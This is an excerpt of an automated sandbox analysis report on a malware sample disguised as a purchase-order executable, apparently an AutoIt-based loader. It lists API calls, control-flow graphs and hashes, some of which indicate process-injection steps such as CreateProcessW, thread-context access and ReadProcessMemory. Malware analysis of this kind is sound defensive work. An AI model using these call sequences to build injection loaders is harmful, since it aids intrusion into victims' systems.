                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2229 4115d7-4115df 2230 4115ee-4115f9 call 4135bb 2229->2230 2233 4115e1-4115ec call 411988 2230->2233 2234 4115fb-4115fc 2230->2234 2233->2230 2237 4115fd-41160e 2233->2237 2238 411610-41163b call 417fc0 call 41130a 2237->2238 2239 41163c-411656 call 4180af call 418105 2237->2239 2238->2239
                                                    APIs
                                                    • _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: ,*H$4*H$@fI
                                                    • API String ID: 615853336-1459471987
                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2248 3972a38-3972ae6 call 3970448 2251 3972aed-3972b13 call 3973948 CreateFileW 2248->2251 2254 3972b15 2251->2254 2255 3972b1a-3972b2a 2251->2255 2256 3972c65-3972c69 2254->2256 2260 3972b31-3972b4b VirtualAlloc 2255->2260 2261 3972b2c 2255->2261 2258 3972cab-3972cae 2256->2258 2259 3972c6b-3972c6f 2256->2259 2262 3972cb1-3972cb8 2258->2262 2263 3972c71-3972c74 2259->2263 2264 3972c7b-3972c7f 2259->2264 2267 3972b52-3972b69 ReadFile 2260->2267 2268 3972b4d 2260->2268 2261->2256 2269 3972d0d-3972d22 2262->2269 2270 3972cba-3972cc5 2262->2270 2263->2264 2265 3972c81-3972c8b 2264->2265 2266 3972c8f-3972c93 2264->2266 2265->2266 2273 3972c95-3972c9f 2266->2273 2274 3972ca3 2266->2274 2275 3972b70-3972bb0 VirtualAlloc 2267->2275 2276 3972b6b 2267->2276 2268->2256 2271 3972d24-3972d2f VirtualFree 2269->2271 2272 3972d32-3972d3a 2269->2272 2277 3972cc7 2270->2277 2278 3972cc9-3972cd5 2270->2278 2271->2272 2273->2274 2274->2258 2279 3972bb7-3972bd2 call 3973b98 2275->2279 2280 3972bb2 2275->2280 2276->2256 2277->2269 2281 3972cd7-3972ce7 2278->2281 2282 3972ce9-3972cf5 2278->2282 2288 3972bdd-3972be7 2279->2288 2280->2256 2284 3972d0b 2281->2284 2285 3972cf7-3972d00 2282->2285 2286 3972d02-3972d08 2282->2286 2284->2262 2285->2284 2286->2284 2289 3972c1a-3972c2e call 39739a8 2288->2289 2290 3972be9-3972c18 call 3973b98 2288->2290 2296 3972c32-3972c36 2289->2296 2297 3972c30 2289->2297 2290->2288 2298 3972c42-3972c46 2296->2298 2299 3972c38-3972c3c CloseHandle 2296->2299 2297->2256 2300 3972c56-3972c5f 2298->2300 2301 3972c48-3972c53 VirtualFree 2298->2301 2299->2298 2300->2251 2300->2256 2301->2300
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03972B09
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03972D2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                    • Instruction ID: 5ff2da55b12811b9152889083537c364179aba567ab9ddfd8f36d5d59c2ef958
                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                    • Instruction Fuzzy Hash: D4A11874E10209EBDB14CFA4C898BEEB7B9BF58304F248999E541BB2C0D7759A40CF54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2302 4102b0-4102c5 SHGetMalloc 2303 4102cb-4102da SHGetDesktopFolder 2302->2303 2304 425dfd-425e0e call 433244 2302->2304 2305 4102e0-41031a call 412fba 2303->2305 2306 41036b-410379 2303->2306 2314 410360-410368 2305->2314 2315 41031c-410331 SHGetPathFromIDListW 2305->2315 2306->2304 2312 41037f-410384 2306->2312 2314->2306 2316 410351-41035d 2315->2316 2317 410333-41034a call 412fba 2315->2317 2316->2314 2317->2316
                                                    APIs
                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                    • String ID: C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                    • API String ID: 3170942423-3523804773
                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                    APIs
                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 3300667738-0
                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                    • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                    APIs
                                                      • Part of subcall function 039726E8: Sleep.KERNELBASE(000001F4), ref: 039726F9
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03972924
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: PLT7N9426O1C
                                                    • API String ID: 2694422964-2746972281
                                                    • Opcode ID: d6a08fdf8b36571a72791e499d1f401aaf2e064da9025f4aa090c5aa971858aa
                                                    • Instruction ID: d9e2543e6baecb493806c9d66897a0627e29f32024d81823516edb3ac6f70e36
                                                    • Opcode Fuzzy Hash: d6a08fdf8b36571a72791e499d1f401aaf2e064da9025f4aa090c5aa971858aa
                                                    • Instruction Fuzzy Hash: DC51CE30D14248EBEF11DBE4C915BEEBB79AF48300F144599E608BB2C0E6B91B45CBA5
                                                    APIs
                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                    • String ID: Line:
                                                    • API String ID: 1874344091-1585850449
                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 1607946009-824357125
                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: v
                                                    • API String ID: 0-2904040280
                                                    • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                    • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentTerminate
                                                    • String ID: v
                                                    • API String ID: 2429186680-2904040280
                                                    • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                    • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03971F15
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03971F39
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03971F5B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                    • Instruction ID: 5ab11a70c956b1a0096239740b3f58d4dd9f8d7a2ff869e90f382aeaefdb9a18
                                                    • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                    • Instruction Fuzzy Hash: E162F934A142589BEB24CFA4C841BEEB376FF58300F1095A9D10DEB2D4E7769E81CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                    • Opcode Fuzzy Hash: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                    APIs
                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                    • _free.LIBCMT ref: 004295A0
                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
